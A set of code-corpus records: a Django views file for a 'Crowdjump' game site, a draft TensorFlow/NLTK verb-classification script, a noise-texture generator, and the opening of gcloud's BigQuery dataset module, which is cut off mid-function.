HistoryViewSet(viewsets.ModelViewSet):\n serializer_class = HistorySerializer\n\n def get_queryset(self):\n return Version.objects.all()\n\n\ndef homepage(request):\n return render(request, 'website/home.html')\n\n# class IndexTestView(generic.View):\n# template_name = 'website/indextest.html'\n#\n# def get(self, request, *args, **kwargs):\n# return render(request, 'website/home.html')\n\n\n\n\n# old views\nclass IndexView(generic.View):\n template_name = 'website/index.html'\n\n def get(self, request, *args, **kwargs):\n num_visits = request.session.get('num_visits', 0)\n request.session['num_visits'] = num_visits+1\n version = Version.objects.all().order_by('-id')[0]\n versionLabel = version.label\n\n return render(request, 'website/index.html', context={\n 'num_visits':num_visits, 'version':versionLabel}, # num_visits appended\n\n )\n\n\nclass HistoryView(generic.ListView):\n model = Version\n template_name = 'website/history.html'\n\n def get_queryset(self):\n return Version.objects.all().order_by('-pub_date')\n\n\nclass IdeasView(generic.ListView):\n template_name = 'website/ideas.html'\n model = Idea\n context_object_name = 'idea_list'\n\n def get_queryset(self):\n ver = Version.objects.all().order_by('-pub_date')[0]\n return Idea.objects.filter(version=ver).order_by('-pub_date')\n\n\nclass GameView(generic.View):\n template_name = 'website/game.html'\n\n def get(self, request, *args, **kwargs):\n return render(request, 'website/game_alt.html')\n\n\nclass PhaserGameView(generic.View):\n template_name = 'website/phasergame.html'\n\n def get(self, request, *args, **kwargs):\n return render(request, 'website/phasergame.html')\n\n\n# @login_required()\n# def idea_new(request):\n# form = IdeaForm()\n# return render(request, 'website/idea_form.html', {'form' : form})\n\n\n@login_required()\ndef idea_new(request):\n if request.method == \"POST\":\n form = IdeaForm(request.POST)\n player = Player.objects.all().filter(user=request.user)[0]\n requests_left = player.requests_left\n if requests_left < 1:\n #return redirect('/website/ideas', {'vote': 'You already submited a request!'})\n return render(request, 'website/ideas.html', {'vote': 'You already '\n 'submited a request this cycle!'})\n elif form.is_valid():\n post = form.save(commit=False)\n post.user = request.user\n ver = Version.objects.all().order_by('-id')[0]\n post.version = ver\n post.save()\n player.requests_left -= 1\n player.save()\n\n return redirect('ideas', pk=post.pk)\n else:\n form = IdeaForm()\n return render(request, 'website/idea_form.html', {'form': form})\n\n\nclass idea_detail(generic.DetailView):\n model = Idea\n template_name = 'website/idea.html'\n\n\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n try:\n user = form.save(commit=False)\n except Player.DoesNotExist:\n user = Player(user=request.user)\n # user.refresh_from_db()\n user.is_active = False\n user.save()\n current_site = get_current_site(request)\n subject = 'Activate your Crowdjump Account'\n newuid = force_text(urlsafe_base64_encode(force_bytes(user.pk)))\n message = render_to_string('website/account_activation_email.html', {\n 'user': user,\n 'domain': current_site.domain,\n # 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n 'uid': newuid,\n 'token': account_activation_token.make_token(user),\n })\n user.email_user(subject, message)\n return redirect('website:account_activation_sent')\n else:\n form = SignUpForm()\n return render(request, 'website/signup.html', {'form': form}, 
RequestContext(request))\n\n\ndef account_activation_sent(request):\n return render(request, 'website/account_activation_sent.html')\n\n\ndef activate(request, uidb64, token):\n try:\n uid = urlsafe_base64_decode(uidb64)\n user = User.objects.get(pk=uid)\n except (TypeError, ValueError, OverflowError, Player.DoesNotExist):\n user = None\n\n if user is not None and account_activation_token.check_token(user, token):\n user.is_active = True\n user.player.email_confirmed = True\n user.save()\n login(request, user)\n return redirect('website:index')\n else:\n return render(request, 'website/account_activation_invalid.html')\n\n", "sub_path": "website/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6808, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 19, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 19, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.all", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 23, "usage_type": "name"}, {"api_name": "serializers.UserSerializer", "line_number": 24, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.Group.objects.all", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.Group.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.Group", "line_number": 31, "usage_type": "name"}, {"api_name": "serializers.GroupSerializer", "line_number": 32, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 35, "usage_type": "name"}, {"api_name": "models.Idea.objects.all", "line_number": 38, "usage_type": "call"}, {"api_name": "models.Idea.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.Idea", "line_number": 38, "usage_type": "name"}, {"api_name": "serializers.IdeaSerializer", "line_number": 40, "usage_type": "name"}, {"api_name": "permissions.IsOwnerOrReadOnly", "line_number": 41, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 47, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 47, "usage_type": "name"}, {"api_name": "serializers.IdeaSerializer", "line_number": 48, "usage_type": "name"}, {"api_name": "models.Idea.objects.filter", "line_number": 51, "usage_type": "call"}, {"api_name": "models.Idea.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "models.Idea", "line_number": 51, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 54, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 54, "usage_type": "name"}, {"api_name": "serializers.IdeaSerializer", "line_number": 55, "usage_type": "name"}, {"api_name": "models.Version.objects.all", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Version.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "models.Version", "line_number": 
58, "usage_type": "name"}, {"api_name": "models.Idea.objects.filter", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Idea.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.Idea", "line_number": 59, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 62, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 62, "usage_type": "name"}, {"api_name": "serializers.HistorySerializer", "line_number": 63, "usage_type": "name"}, {"api_name": "models.Version.objects.all", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Version.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.Version", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 70, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 82, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 82, "usage_type": "name"}, {"api_name": "models.Version.objects.all", "line_number": 88, "usage_type": "call"}, {"api_name": "models.Version.objects", "line_number": 88, "usage_type": "attribute"}, {"api_name": "models.Version", "line_number": 88, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 91, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 97, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 97, "usage_type": "name"}, {"api_name": "models.Version", "line_number": 98, "usage_type": "name"}, {"api_name": "models.Version.objects.all", "line_number": 102, "usage_type": "call"}, {"api_name": "models.Version.objects", "line_number": 102, "usage_type": "attribute"}, {"api_name": "models.Version", "line_number": 102, "usage_type": "name"}, {"api_name": "django.views.generic.ListView", "line_number": 105, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 105, "usage_type": "name"}, {"api_name": "models.Idea", "line_number": 107, "usage_type": "name"}, {"api_name": "models.Version.objects.all", "line_number": 111, "usage_type": "call"}, {"api_name": "models.Version.objects", "line_number": 111, "usage_type": "attribute"}, {"api_name": "models.Version", "line_number": 111, "usage_type": "name"}, {"api_name": "models.Idea.objects.filter", "line_number": 112, "usage_type": "call"}, {"api_name": "models.Idea.objects", "line_number": 112, "usage_type": "attribute"}, {"api_name": "models.Idea", "line_number": 112, "usage_type": "name"}, {"api_name": "django.views.generic.View", "line_number": 115, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 115, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 119, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 122, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 122, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 126, "usage_type": "call"}, {"api_name": "forms.IdeaForm", "line_number": 138, "usage_type": "call"}, {"api_name": "models.Player.objects.all", "line_number": 139, "usage_type": "call"}, {"api_name": "models.Player.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "models.Player", "line_number": 139, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 143, "usage_type": "call"}, {"api_name": "models.Version.objects.all", "line_number": 148, 
"usage_type": "call"}, {"api_name": "models.Version.objects", "line_number": 148, "usage_type": "attribute"}, {"api_name": "models.Version", "line_number": 148, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 154, "usage_type": "call"}, {"api_name": "forms.IdeaForm", "line_number": 156, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 157, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 135, "usage_type": "call"}, {"api_name": "django.views.generic.DetailView", "line_number": 160, "usage_type": "attribute"}, {"api_name": "django.views.generic", "line_number": 160, "usage_type": "name"}, {"api_name": "models.Idea", "line_number": 161, "usage_type": "name"}, {"api_name": "forms.SignUpForm", "line_number": 167, "usage_type": "call"}, {"api_name": "models.Player.DoesNotExist", "line_number": 171, "usage_type": "attribute"}, {"api_name": "models.Player", "line_number": 171, "usage_type": "name"}, {"api_name": "models.Player", "line_number": 172, "usage_type": "call"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 176, "usage_type": "call"}, {"api_name": "django.utils.encoding.force_text", "line_number": 178, "usage_type": "call"}, {"api_name": "django.utils.http.urlsafe_base64_encode", "line_number": 178, "usage_type": "call"}, {"api_name": "django.utils.encoding.force_bytes", "line_number": 178, "usage_type": "call"}, {"api_name": "django.template.loader.render_to_string", "line_number": 179, "usage_type": "call"}, {"api_name": "tokens.account_activation_token.make_token", "line_number": 184, "usage_type": "call"}, {"api_name": "tokens.account_activation_token", "line_number": 184, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 187, "usage_type": "call"}, {"api_name": "forms.SignUpForm", "line_number": 189, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 190, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 194, "usage_type": "call"}, {"api_name": "django.utils.http.urlsafe_base64_decode", "line_number": 199, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 200, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 200, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 200, "usage_type": "name"}, {"api_name": "models.Player.DoesNotExist", "line_number": 201, "usage_type": "attribute"}, {"api_name": "models.Player", "line_number": 201, "usage_type": "name"}, {"api_name": "tokens.account_activation_token.check_token", "line_number": 204, "usage_type": "call"}, {"api_name": "tokens.account_activation_token", "line_number": 204, "usage_type": "name"}, {"api_name": "django.contrib.auth.login", "line_number": 208, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 209, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 211, "usage_type": "call"}]} +{"seq_id": "483422247", "text": "'''\nA Multilayer Perceptron implementation example using TensorFlow library.\nThis example is using the MNIST database of handwritten digits\n(http://yann.lecun.com/exdb/mnist/)\nAuthor: Aymeric Damien\nProject: https://github.com/aymericdamien/TensorFlow-Examples/\n'''\n\nfrom __future__ import 
print_function\n\nimport tensorflow as tf\nimport csv\n\n\n\n\nimport pandas as pd\n\n# TODO\n\n# load data from dataset and create wrapper functions for batching\n\n# input and output dimensions are read from dataset\n\ntraining = 'training.csv'\ntest = 'test.csv'\nconfiguration = 'configuration.ini'\n\n\n# read configuration file\nwith open (configuration, 'r') as f:\n    config = [int(w) for w in [x.strip() for x in f.readlines()]]\ninputnode = config[1]\noutputnode = config[-1]\n\ndef ReadInput (dataline):\n    return [dataline[i] for i in range(1,config[1])]\n\ndef ReadOutput (dataline):\n    return [dataline[i] for i in range ((config[1]+1),len(dataline))] # read out only the last cell that represent the output vector\n\ndef LoadCsvDataFrame (filename):\n    vectors = {}\n    infile = open(filename, \"r\")\n    reader = csv.reader(infile, delimiter=';', quoting=csv.QUOTE_NONNUMERIC)\n    for row in reader:\n        vectors[row[0]] = row[1:]\n        vectors[row[0]] = {'inputVector': ReadInput(row), 'outputVector':ReadOutput(row), 'outLabel': row[config[1]]}\n    \n    return vectors \na=LoadCsvDataFrame(test)\n\n\n# ATTENTION!!1 LOST ONE CELL AND I DO NOT UNDERSTAND WHERE! INPUT VECTOR LEN < DI 1\n\ntraining = LoadCsvDataFrame(training)\ntest = LoadCsvDataFrame(test)\n\n\n\n\ndef FeaturesExtractor (word):\n    f1 = word[-1] # last character\n    f2 = word[-2:] # last 2 char\n    f3 = word[-3:]\n    f4 = word[0]\n    f5 = word[:1]\n    f6 = word[:2]\n    \n    return {'f1':f1,'f2':f2,'f3':f3,'f4':f4,'f5':f5,'f6':f6}\n\nw='mangiavo'\nprint (FeaturesExtractor(w))\n\n\n\n\n\n\n\n\nimport nltk\nfeaturesets = [(FeaturesExtractor(w),training[w]['outLabel'] ) for w in training.keys()]\ntrain_set, test_set = featuresets[500:], featuresets[:500]\nclassifier = nltk.NaiveBayesClassifier.train(train_set)\n\n#>>> classifier.classify(FeaturesExtractor('mangiavo'))\n#'VER'\n#>>> classifier.classify(FeaturesExtractor('mangiavamo'))\n#'VER'\n#>>> classifier.classify(FeaturesExtractor('mangiai'))\n#'ADJ'\n#>>> classifier.classify(FeaturesExtractor('mangiai'))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# Parameters\nlearning_rate = 0.001\ntraining_epochs = 15\nbatch_size = 100\ndisplay_step = 1\n\n# Network Parameters\nn_hidden_1 =500 # 256 # 1st layer number of features\nn_hidden_2 = 256 # 2nd layer number of features\nn_input = config[1]# 784 # MNIST data input (img shape: 28*28)\nn_classes = config[-1] #10 # MNIST total classes (0-9 digits)\n\n# tf Graph input\nx = tf.placeholder(\"float\", [None, n_input])\ny = tf.placeholder(\"float\", [None, n_classes])\n\n\n# Create model\ndef multilayer_perceptron(x, weights, biases):\n    # Hidden layer with RELU activation\n    layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])\n    layer_1 = tf.nn.relu(layer_1)\n    # Hidden layer with RELU activation\n    layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])\n    layer_2 = tf.nn.relu(layer_2)\n    # Output layer with linear activation\n    out_layer = tf.matmul(layer_2, weights['out']) + biases['out']\n    return out_layer\n\n# Store layers weight & bias\nweights = {\n    'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),\n    'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),\n    'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))\n}\nbiases = {\n    'b1': tf.Variable(tf.random_normal([n_hidden_1])),\n    'b2': tf.Variable(tf.random_normal([n_hidden_2])),\n    'out': tf.Variable(tf.random_normal([n_classes]))\n}\n\n# Construct model\npred = multilayer_perceptron(x, weights, biases)\n\n# Define loss and optimizer\ncost = 
tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n# Initializing the variables\ninit = tf.global_variables_initializer()\n\n\n## continuare da qui con funztione che gestiste batching\n## Launch the graph\n#with tf.Session() as sess:\n# sess.run(init)\n#\n# # Training cycle\n# for epoch in range(training_epochs):\n# avg_cost = 0.\n# total_batch = int(mnist.train.num_examples/batch_size)\n# print('total batch', total_batch)\n# # Loop over all batches\n# for i in range(total_batch):\n# batch_x, batch_y = mnist.train.next_batch(1)#batch_size)\n## with open('batch_x.txt','a') as fx:\n## for i in range(len(batch_x)):\n### print (len(batch_x))\n# print (batch_x[0])\n# print \n# print \n# \n### print\n#### print (batch_x[1])\n### with open('batch_y.txt','a') as fy:\n### fx.write(str(batch_x[1]))\n### fy.write(str(batch_y[1]))\n# print (len(batch_y[0]))\n## break\n## \n# # Run optimization op (backprop) and cost op (to get loss value)\n# _, c = sess.run([optimizer, cost], feed_dict={x: batch_x,\n# y: batch_y})\n# # Compute average loss\n# avg_cost += c / total_batch\n# # Display logs per epoch step\n# if epoch % display_step == 0:\n# print(\"Epoch:\", '%04d' % (epoch+1), \"cost=\", \\\n# \"{:.9f}\".format(avg_cost))\n# print(\"Optimization Finished!\")\n#\n# # Test model\n# correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\n# # Calculate accuracy\n# accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n# print(\"Accuracy:\", accuracy.eval({x: mnist.test.images, y: mnist.test.labels}))", "sub_path": "prova/PredictionVerb_NN_in_development.py", "file_name": "PredictionVerb_NN_in_development.py", "file_ext": "py", "file_size_in_byte": 5808, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "csv.reader", "line_number": 45, "usage_type": "call"}, {"api_name": "csv.QUOTE_NONNUMERIC", "line_number": 45, "usage_type": "attribute"}, {"api_name": "nltk.NaiveBayesClassifier.train", "line_number": 85, "usage_type": "call"}, {"api_name": "nltk.NaiveBayesClassifier", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.add", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 130, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 133, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", 
"line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 145, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 145, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 147, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 147, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 154, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 154, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 154, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 155, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 155, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 158, "usage_type": "call"}]} +{"seq_id": "361642575", "text": "#\n# script to build texture for \"Third Space\" effect\n#\n# Author: Alex V. Boreskoff\n#\n\nimport noise\nimport Image\nimport math\n\nsize = 256\ninv = 1.0 / size\n\n\nim = Image.new ( \"RGB\", (size, size) )\n\nredOffs = ( 1.3579, 0.25672, 0.4567 )\ngreenOffs = ( 2.4786, 1.54567, 2.654 )\nblueOffs = ( 3.5795, 2.16713, 1.0912 )\n\n # now build the texture\nfor x in range ( size ):\n for y in range ( size ):\n x1 = inv * x\n y1 = inv * y\n\n # get func value based on noise\n n = ( 1 + noise.noise ( redOffs [0] + 35*x1, redOffs [1] + 4*y1, redOffs [2] ) ) * 0.15;\n v = (y1 + n) * 0.5\n\n if v < 0:\n v = 1.0\n\n im.putpixel ( (x,y), (255*v, 0, 0) )\n\nim.show ()\nim.save ( \"ThirdSpace.bmp\", \"bmp\" )\n", "sub_path": "Thin film Interference/Code/scripts/gen-3s-texture.py", "file_name": "gen-3s-texture.py", "file_ext": "py", "file_size_in_byte": 767, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "Image.new", "line_number": 15, "usage_type": "call"}, {"api_name": "noise.noise", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "209471164", "text": "# Copyright 2015 Google Inc. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Define API Datasets.\"\"\"\nimport six\n\nfrom gcloud._helpers import _datetime_from_microseconds\nfrom gcloud.exceptions import NotFound\nfrom gcloud.bigquery.table import Table\n\n\nclass AccessGrant(object):\n \"\"\"Represent grant of an access role to an entity.\n\n :type role: string (one of 'OWNER', 'WRITER', 'READER').\n :param role: role granted to the entity.\n\n :type entity_type: string (one of 'specialGroup', 'groupByEmail', or\n 'userByEmail')\n :param entity_type: type of entity being granted the role.\n\n :type entity_id: string\n :param entity_id: ID of entity being granted the role.\n \"\"\"\n def __init__(self, role, entity_type, entity_id):\n self.role = role\n self.entity_type = entity_type\n self.entity_id = entity_id\n\n def __repr__(self):\n return '' % (\n self.role, self.entity_type, self.entity_id)\n\n\nclass Dataset(object):\n \"\"\"Datasets are containers for tables.\n\n See:\n https://cloud.google.com/bigquery/docs/reference/v2/datasets\n\n :type name: string\n :param name: the name of the dataset\n\n :type client: :class:`gcloud.bigquery.client.Client`\n :param client: A client which holds credentials and project configuration\n for the dataset (which requires a project).\n\n :type access_grants: list of :class:`AccessGrant`\n :param access_grants: roles granted to entities for this dataset\n \"\"\"\n\n def __init__(self, name, client, access_grants=()):\n self.name = name\n self._client = client\n self._properties = {}\n self.access_grants = access_grants\n\n @property\n def project(self):\n \"\"\"Project bound to the dataset.\n\n :rtype: string\n :returns: the project (derived from the client).\n \"\"\"\n return self._client.project\n\n @property\n def path(self):\n \"\"\"URL path for the dataset's APIs.\n\n :rtype: string\n :returns: the path based on project and dataste name.\n \"\"\"\n return '/projects/%s/datasets/%s' % (self.project, self.name)\n\n @property\n def access_grants(self):\n \"\"\"Dataset's access grants.\n\n :rtype: list of :class:`AccessGrant`\n :returns: roles granted to entities for this dataset\n \"\"\"\n return list(self._access_grants)\n\n @access_grants.setter\n def access_grants(self, value):\n \"\"\"Update dataset's access grants\n\n :type value: list of :class:`AccessGrant`\n :param value: roles granted to entities for this dataset\n\n :raises: TypeError if 'value' is not a sequence, or ValueError if\n any item in the sequence is not an AccessGrant\n \"\"\"\n if not all(isinstance(field, AccessGrant) for field in value):\n raise ValueError('Values must be AccessGrant instances')\n self._access_grants = tuple(value)\n\n @property\n def created(self):\n \"\"\"Datetime at which the dataset was created.\n\n :rtype: ``datetime.datetime``, or ``NoneType``\n :returns: the creation time (None until set from the server).\n \"\"\"\n creation_time = self._properties.get('creationTime')\n if creation_time is not None:\n # creation_time will be in milliseconds.\n 
return _datetime_from_microseconds(1000.0 * creation_time)\n\n @property\n def dataset_id(self):\n \"\"\"ID for the dataset resource.\n\n :rtype: string, or ``NoneType``\n :returns: the ID (None until set from the server).\n \"\"\"\n return self._properties.get('id')\n\n @property\n def etag(self):\n \"\"\"ETag for the dataset resource.\n\n :rtype: string, or ``NoneType``\n :returns: the ETag (None until set from the server).\n \"\"\"\n return self._properties.get('etag')\n\n @property\n def modified(self):\n \"\"\"Datetime at which the dataset was last modified.\n\n :rtype: ``datetime.datetime``, or ``NoneType``\n :returns: the modification time (None until set from the server).\n \"\"\"\n modified_time = self._properties.get('lastModifiedTime')\n if modified_time is not None:\n # modified_time will be in milliseconds.\n return _datetime_from_microseconds(1000.0 * modified_time)\n\n @property\n def self_link(self):\n \"\"\"URL for the dataset resource.\n\n :rtype: string, or ``NoneType``\n :returns: the URL (None until set from the server).\n \"\"\"\n return self._properties.get('selfLink')\n\n @property\n def default_table_expiration_ms(self):\n \"\"\"Default expiration time for tables in the dataset.\n\n :rtype: integer, or ``NoneType``\n :returns: The time in milliseconds, or None (the default).\n \"\"\"\n return self._properties.get('defaultTableExpirationMs')\n\n @default_table_expiration_ms.setter\n def default_table_expiration_ms(self, value):\n \"\"\"Update default expiration time for tables in the dataset.\n\n :type value: integer, or ``NoneType``\n :param value: new default time, in milliseconds\n\n :raises: ValueError for invalid value types.\n \"\"\"\n if not isinstance(value, six.integer_types) and value is not None:\n raise ValueError(\"Pass an integer, or None\")\n self._properties['defaultTableExpirationMs'] = value\n\n @property\n def description(self):\n \"\"\"Description of the dataset.\n\n :rtype: string, or ``NoneType``\n :returns: The description as set by the user, or None (the default).\n \"\"\"\n return self._properties.get('description')\n\n @description.setter\n def description(self, value):\n \"\"\"Update description of the dataset.\n\n :type value: string, or ``NoneType``\n :param value: new description\n\n :raises: ValueError for invalid value types.\n \"\"\"\n if not isinstance(value, six.string_types) and value is not None:\n raise ValueError(\"Pass a string, or None\")\n self._properties['description'] = value\n\n @property\n def friendly_name(self):\n \"\"\"Title of the dataset.\n\n :rtype: string, or ``NoneType``\n :returns: The name as set by the user, or None (the default).\n \"\"\"\n return self._properties.get('friendlyName')\n\n @friendly_name.setter\n def friendly_name(self, value):\n \"\"\"Update title of the dataset.\n\n :type value: string, or ``NoneType``\n :param value: new title\n\n :raises: ValueError for invalid value types.\n \"\"\"\n if not isinstance(value, six.string_types) and value is not None:\n raise ValueError(\"Pass a string, or None\")\n self._properties['friendlyName'] = value\n\n @property\n def location(self):\n \"\"\"Location in which the dataset is hosted.\n\n :rtype: string, or ``NoneType``\n :returns: The location as set by the user, or None (the default).\n \"\"\"\n return self._properties.get('location')\n\n @location.setter\n def location(self, value):\n \"\"\"Update location in which the dataset is hosted.\n\n :type value: string, or ``NoneType``\n :param value: new location\n\n :raises: ValueError for invalid value 
types.\n \"\"\"\n if not isinstance(value, six.string_types) and value is not None:\n raise ValueError(\"Pass a string, or None\")\n self._properties['location'] = value\n\n @classmethod\n def from_api_repr(cls, resource, client):\n \"\"\"Factory: construct a dataset given its API representation\n\n :type resource: dict\n :param resource: dataset resource representation returned from the API\n\n :type client: :class:`gcloud.bigquery.client.Client`\n :param client: Client which holds credentials and project\n configuration for the dataset.\n\n :rtype: :class:`gcloud.bigquery.dataset.Dataset`\n :returns: Dataset parsed from ``resource``.\n \"\"\"\n if ('datasetReference' not in resource or\n 'datasetId' not in resource['datasetReference']):\n raise KeyError('Resource lacks required identity information:'\n '[\"datasetReference\"][\"datasetId\"]')\n name = resource['datasetReference']['datasetId']\n dataset = cls(name, client=client)\n dataset._set_properties(resource)\n return dataset\n\n def _require_client(self, client):\n \"\"\"Check client or verify over-ride.\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n\n :rtype: :class:`gcloud.bigquery.client.Client`\n :returns: The client passed in or the currently bound client.\n \"\"\"\n if client is None:\n client = self._client\n return client\n\n def _parse_access_grants(self, access):\n \"\"\"Parse a resource fragment into a set of access grants.\n\n :type access: list of mappings\n :param access: each mapping represents a single access grant\n\n :rtype: list of :class:`AccessGrant`\n :returns: a list of parsed grants\n \"\"\"\n result = []\n for grant in access:\n grant = grant.copy()\n role = grant.pop('role')\n # Hypothetical case: we don't know that the back-end will ever\n # return such structures, but they are logical. 
See:\n # https://github.com/GoogleCloudPlatform/gcloud-python/pull/1046#discussion_r36687769\n for entity_type, entity_id in sorted(grant.items()):\n result.append(\n AccessGrant(role, entity_type, entity_id))\n return result\n\n def _set_properties(self, api_response):\n \"\"\"Update properties from resource in body of ``api_response``\n\n :type api_response: httplib2.Response\n :param api_response: response returned from an API call\n \"\"\"\n self._properties.clear()\n cleaned = api_response.copy()\n access = cleaned.pop('access', ())\n self.access_grants = self._parse_access_grants(access)\n if 'creationTime' in cleaned:\n cleaned['creationTime'] = float(cleaned['creationTime'])\n if 'lastModifiedTime' in cleaned:\n cleaned['lastModifiedTime'] = float(cleaned['lastModifiedTime'])\n self._properties.update(cleaned)\n\n def _build_access_resource(self):\n \"\"\"Generate a resource fragment for dataset's access grants.\"\"\"\n result = []\n for grant in self.access_grants:\n info = {'role': grant.role, grant.entity_type: grant.entity_id}\n result.append(info)\n return result\n\n def _build_resource(self):\n \"\"\"Generate a resource for ``create`` or ``update``.\"\"\"\n resource = {\n 